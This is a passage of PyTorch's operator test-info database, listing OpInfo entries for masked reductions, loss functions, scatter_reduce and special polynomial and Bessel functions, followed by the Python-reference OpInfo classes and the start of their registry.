'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_masked_norm, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.var', ref=reference_reduction_numpy(np.var) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02), torch.bfloat16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_ref_small_input'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], sample_inputs_func=sample_inputs_masked_std_var, gradcheck_wrapper=gradcheck_wrapper_masked_operation, check_batched_grad=True, check_batched_forward_grad=True, ), ReductionOpInfo( '_masked.std', ref=reference_reduction_numpy(np.std) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] 
DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.float16,)), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_ref_small_input'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), ], sample_inputs_func=sample_inputs_masked_std_var, gradcheck_wrapper=gradcheck_wrapper_masked_operation, check_batched_grad=True, check_batched_forward_grad=True, ), OpInfo( '_masked.softmax', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.log_softmax', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.bfloat16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), ], gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.softmin', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.normalize', method_variant=None, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_normalize, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Prexisting issue with linalg.vector_norm DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # RuntimeError: "clamp_min_cpu" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestMasked', 'test_reference_masked', device_type='cpu', dtypes=[torch.half]), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo( "nn.functional.ctc_loss", ref=_NOTHING, dtypes=floating_types(), supports_out=False, sample_inputs_func=sample_inputs_ctc_loss, skips=( # https://github.com/pytorch/pytorch/issues/67462 # torch.autograd.gradcheck.GradcheckError: Jacobian mismatch for output 0 with respect to input 0 DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_grad", dtypes=(torch.float64,), ), # RuntimeError: derivative for aten::_ctc_loss_backward is not implemented DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_gradgrad", dtypes=(torch.float64,), ), # RuntimeError: derivative for aten::_ctc_loss_backward is not implemented DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), # Operation calls data_ptr() somewhere; needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), ), OpInfo( "nn.functional.cosine_embedding_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cosine_embedding_loss, ), OpInfo( "nn.functional.nll_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_nll_loss, supports_forward_ad=True, assert_jit_shape_analysis=True, skips=( # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0, i1): # return torch.nn.functional.nll_loss(i0, i1, weight=tensor([8.4784, 1.7658, 4.3228], dtype=torch.float32)) # ~~~~~~ <--- HERE DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), ), OpInfo( "nn.functional.gaussian_nll_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_gaussian_nll_loss, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, # please report a bug to PyTorch. 
DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), decorators=( DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ) ), OpInfo( "nn.functional.hinge_embedding_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_hinge_embedding_loss, error_inputs_func=error_inputs_hinge_embedding_loss, reference_inputs_func=reference_inputs_hinge_embedding_loss, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ) ), OpInfo( "nn.functional.huber_loss", aten_backward_name='huber_loss_backward', ref=_NOTHING, dtypes=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, sample_inputs_func=sample_inputs_huber_loss, skips=( # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ) ), OpInfo( "nn.functional.pdist", ref=reference_pdist, sample_inputs_func=sample_inputs_pdist, dtypes=floating_types(), supports_out=False, supports_gradgrad=False), OpInfo( "nn.functional.poisson_nll_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_poisson_nll_loss, ), OpInfo( "argsort", dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_argsort, supports_out=False, supports_autograd=False, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), ), ), OpInfo( "repeat_interleave", dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_repeat_interleave, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.pairwise_distance", ref=lambda a, b, p=2.0, eps=1e-6, keepdim=False: ( np.sum(np.abs(a - b + eps) ** p, axis=-1, keepdims=keepdim) ** (1 / p) ), sample_inputs_func=sample_inputs_pairwise_distance, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), ), ), OpInfo( "nn.functional.pixel_shuffle", sample_inputs_func=sample_inputs_pixel_shuffle, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( 
"nn.functional.pixel_unshuffle", sample_inputs_func=sample_inputs_pixel_unshuffle, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.kl_div", sample_inputs_func=sample_inputs_kl_div, dtypes=floating_types_and(torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64), backward_dtypes=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64), dtypesIfCUDA=floating_types_and( torch.float16, torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64 ), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64), supports_out=False, check_batched_grad=False, supports_forward_ad=True, skips=( # See https://github.com/pytorch/pytorch/issues/65466 DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_gradgrad", ), ), ), OpInfo( "diagflat", ref=lambda input, offset=0: np.diagflat(input, k=offset), sample_inputs_func=sample_inputs_diagflat, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo( 'scatter_reduce', variant_test_name='sum', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='prod', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='mean', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='amin', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='amax', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), UnaryUfuncInfo( 'special.bessel_j0', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.j0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_j1', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.j1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_y0', decorators=( precisionOverride( { torch.float32: 
1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.y0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_y1', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.y1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_t', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_u', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_v', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_w', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.hermite_polynomial_h', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.hermite_polynomial_he', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.laguerre_polynomial_l', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.legendre_polynomial_p', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_i0', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.i0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_i1', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.i1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_k0', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.k0 if TEST_SCIPY else _NOTHING, 
supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_k1', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.k1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_t', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_u', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_v', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_w', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), ] # NOTE [Python References] # Python References emulate existing PyTorch operations, but can ultimately # be expressed in terms of "primitive" operations from torch._prims. # # These references are experimental. # See https://dev-discuss.pytorch.org/t/tracing-with-primitives-update-0/577 # for additional context. # # Python Reference OpInfos should be added to the python_ref_db list below. # Tests can opt-into running on these references by including # that list in the Sequence they pass to the @ops decorator. # # When a Python Reference OpInfo is constructed a pointer to an # existing OpInfo must be provided using the torch_opinfo_name kwarg. # The existing OpInfo with that name and no variant will be found # to inherit from. # # Instead of just inheriting the existing OpInfo's metadata, the # Python Reference OpInfos inherit the existing OpInfo's # construction arguments. These arguments can be overridden # by adding kwargs to the constructor. def _find_referenced_opinfo(referenced_name): ''' Finds the OpInfo with the given name that has no variant name. 
'''
    for opinfo in op_db:
        if opinfo.name == referenced_name and opinfo.variant_test_name == '':
            return opinfo

def _inherit_constructor_args(name, op, inherited, overrides):
    # inherits metadata
    common_kwargs = {
        'name': name,
        'op': op,
        'aliases': None,  # TODO add a check for alias coverage
        'method_variant': None,
        'inplace_variant': None,  # TODO: add a check for inplace coverage
        'supports_scripting': False,
    }

    # Acquires inherited kwargs
    kwargs = inherited.copy()

    # Fixes metadata
    if 'kwargs' in kwargs:
        kwargs.update(kwargs['kwargs'])
        del kwargs['kwargs']
    if 'self' in kwargs:
        del kwargs['self']
    if '__class__' in kwargs:
        del kwargs['__class__']
    if 'skips' in kwargs:
        del kwargs['skips']
    if 'decorators' in kwargs:
        del kwargs['decorators']

    # Overrides metadata
    kwargs.update(common_kwargs)
    kwargs.update(overrides)
    kwargs['supports_autograd'] = False
    kwargs['supports_gradgrad'] = False
    kwargs['supports_fwgrad_bwgrad'] = False
    kwargs['supports_inplace_autograd'] = False
    kwargs['supports_forward_ad'] = False

    return kwargs

class PythonRefInfo(OpInfo):
    '''
    An OpInfo for a Python reference of an OpInfo base class operation.
    '''
    def __init__(
            self,
            name,  # the string name of the callable Python reference
            *,
            op=None,  # the function variant of the operation, populated as torch.<name> if None
            torch_opinfo_name,  # the string name of the corresponding torch opinfo
            validate_view_consistency=True,
            **kwargs):  # additional kwargs override kwargs inherited from the torch opinfo

        self.torch_opinfo_name = torch_opinfo_name
        self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name)
        self.validate_view_consistency = validate_view_consistency
        assert isinstance(self.torch_opinfo, OpInfo)

        inherited = self.torch_opinfo._original_opinfo_args
        ukwargs = _inherit_constructor_args(name, op, inherited, kwargs)

        super(PythonRefInfo, self).__init__(**ukwargs)

class ReductionPythonRefInfo(ReductionOpInfo):
    '''
    An OpInfo for a Python reference of a reduction operation.
    '''
    def __init__(
            self,
            name,  # the string name of the callable Python reference
            *,
            op=None,  # the function variant of the operation, populated as torch.<name> if None
            torch_opinfo_name,  # the string name of the corresponding torch opinfo
            **kwargs):  # additional kwargs override kwargs inherited from the torch opinfo

        self.torch_opinfo_name = torch_opinfo_name
        self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name)
        assert isinstance(self.torch_opinfo, ReductionOpInfo)

        inherited = self.torch_opinfo._original_reduction_args
        ukwargs = _inherit_constructor_args(name, op, inherited, kwargs)

        # See https://github.com/pytorch/pytorch/issues/77216
        self.validate_view_consistency = False

        super().__init__(**ukwargs)

class ElementwiseUnaryPythonRefInfo(UnaryUfuncInfo):
    '''
    An OpInfo for a Python reference of an elementwise unary operation.
''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, UnaryUfuncInfo) inherited = self.torch_opinfo._original_unary_ufunc_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(ElementwiseUnaryPythonRefInfo, self).__init__(**ukwargs) class ElementwiseBinaryPythonRefInfo(BinaryUfuncInfo): ''' An OpInfo for a Python reference of an elementwise binary operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, BinaryUfuncInfo) inherited = self.torch_opinfo._original_binary_ufunc_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(ElementwiseBinaryPythonRefInfo, self).__init__(**ukwargs) # Separate registry for experimental Python Reference OpInfos. python_ref_db = [ # # Elementwise Unary OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.abs", torch_opinfo_name="abs", ), ElementwiseUnaryPythonRefInfo( "_refs.acos", torch_opinfo_name="acos", ), ElementwiseUnaryPythonRefInfo( "_refs.acosh", torch_opinfo_name="acosh", ), ElementwiseUnaryPythonRefInfo( "_refs.asin", torch_opinfo_name="asin", ), ElementwiseUnaryPythonRefInfo( "_refs.atan", torch_opinfo_name="atan", ), ElementwiseUnaryPythonRefInfo( "_refs.bitwise_not", torch_opinfo_name="bitwise_not", ), ElementwiseUnaryPythonRefInfo( "_refs.ceil", torch_opinfo_name="ceil", ), ElementwiseUnaryPythonRefInfo( "_refs.cos", torch_opinfo_name="cos", ), ElementwiseUnaryPythonRefInfo( "_refs.cosh", torch_opinfo_name="cosh", ), ElementwiseUnaryPythonRefInfo( "_refs.digamma", torch_opinfo_name="digamma", ), ElementwiseUnaryPythonRefInfo( "_refs.erf", torch_opinfo_name="erf", ), ElementwiseUnaryPythonRefInfo( "_refs.erfinv", torch_opinfo_name="erfinv", ), ElementwiseUnaryPythonRefInfo( "_refs.erfc", torch_opinfo_name="erfc", ), ElementwiseUnaryPythonRefInfo( "_refs.exp", torch_opinfo_name="exp", ), ElementwiseUnaryPythonRefInfo( "_refs.expm1", torch_opinfo_name="expm1", ), ElementwiseUnaryPythonRefInfo( "_refs.exp2", torch_opinfo_name="exp2", ), ElementwiseUnaryPythonRefInfo( "_refs.fill", torch_opinfo_name="fill", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.floor", torch_opinfo_name="floor", ), ElementwiseUnaryPythonRefInfo( "_refs.frac", torch_opinfo_name="frac", ), ElementwiseUnaryPythonRefInfo( "_refs.isfinite", torch_opinfo_name="isfinite", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.isinf", torch_opinfo_name="isinf", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.isnan", torch_opinfo_name="isnan", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.i0", torch_opinfo_name="i0", ), ElementwiseUnaryPythonRefInfo( "_refs.lgamma", torch_opinfo_name="lgamma", ), ElementwiseUnaryPythonRefInfo( "_refs.log", torch_opinfo_name="log", ), ElementwiseUnaryPythonRefInfo( 
"_refs.log1p", torch_opinfo_name="log1p", ), ElementwiseUnaryPythonRefInfo( "_refs.log10", torch_opinfo_name="log10", ), ElementwiseUnaryPythonRefInfo( "_refs.log2", torch_opinfo_name="log2", ), ElementwiseUnaryPythonRefInfo( "_refs.nan_to_num", torch_opinfo_name="nan_to_num", ), ElementwiseUnaryPythonRefInfo( "_refs.neg", torch_opinfo_name="neg", ), ElementwiseUnaryPythonRefInfo( "_refs.positive", torch_opinfo_name="positive", ), ElementwiseUnaryPythonRefInfo( "_refs.reciprocal", torch_opinfo_name="reciprocal", ), ElementwiseUnaryPythonRefInfo( "_refs.round", torch_opinfo_name="round", ), ElementwiseUnaryPythonRefInfo( "_refs.sigmoid", torch_opinfo_name="sigmoid", # Reference: https://github.com/pytorch/pytorch/issues/56012 handles_complex_extremal_values=False, handles_large_floats=False, ), ElementwiseUnaryPythonRefInfo( "_refs.sign", torch_opinfo_name="sign", ), ElementwiseUnaryPythonRefInfo( "_refs.signbit", torch_opinfo_name="signbit", ), ElementwiseUnaryPythonRefInfo( "_refs.sin", torch_opinfo_name="sin", ), ElementwiseUnaryPythonRefInfo( "_refs.sinh", torch_opinfo_name="sinh", ), ElementwiseUnaryPythonRefInfo( "_refs.sqrt", torch_opinfo_name="sqrt", ), ElementwiseUnaryPythonRefInfo( "_refs.square", torch_opinfo_name="square", ), ElementwiseUnaryPythonRefInfo( "_refs.tan", torch_opinfo_name="tan", ), ElementwiseUnaryPythonRefInfo( "_refs.tanh", torch_opinfo_name="tanh", ), # # Elementwise Unary Special OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.special.i0e", torch_opinfo_name="special.i0e", ), ElementwiseUnaryPythonRefInfo( "_refs.special.i1", 